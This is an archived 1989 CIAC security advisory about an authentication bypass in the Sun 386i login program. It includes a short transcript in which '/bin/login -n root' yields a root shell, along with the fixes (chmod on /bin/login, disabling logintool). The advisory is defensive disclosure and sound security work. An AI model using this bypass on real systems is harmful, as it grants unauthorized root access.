informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/hacking/386i.txt

55 lines
1.9 KiB
Plaintext
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

________________________________________________________________
THE COMPUTER INCIDENT ADVISORY CAPABILITY
CIAC
ADVISORY NOTICE
________________________________________________________________
COMPUTER SECURITY INFORMATION
Authentication bypass in Sun 386i machines
The login program supplied by Sun for its 386i machines, version 4.0.1 of Sun
OS (SOS), accepts the argument "-n" which bypasses authentication. It was
apparently added in order to allow the Sun program "logintool" to do the
authentication and have login do the housekeeping. This allows a user who
discovers the new argument to the login program to become a root user in
several ways. An example of one method is attached.
A temporary solution is to disable logintool and patch the binary using
the "strings" and "adb"method used last November. Alternatively and more
simly, log in a root and issue the command
chmod 110 /bin/login
Example of login endrun:
---------------------------------------------------
Script started on Tue Apr 11 14:16:25 1989
myhost[1] whoami
oconnor
myhost[2] /bin/login -n root
Login incorrect
login: onceuponatime
No home directory specified in password file! Logging in with home=/
# whoami
root
# who a i
myhost!onceupon ttyp2 Apr 11 14:17
# ^D myhost1[3] ^D
script done on Tue Apr 11 14:17:34 1989
---------------------------------------------------
Sun is presently working on a patch. When it is available, CIAC will
inform you accordingly.
For questions or additional information, please contact
Gene Schultz
CIAC Team Leader
(415) 422-8193 or FTS 532-8193
gschultz%nsspa@icdc.llnl.gov

Reference in New Issue View Git Blame Copy Permalink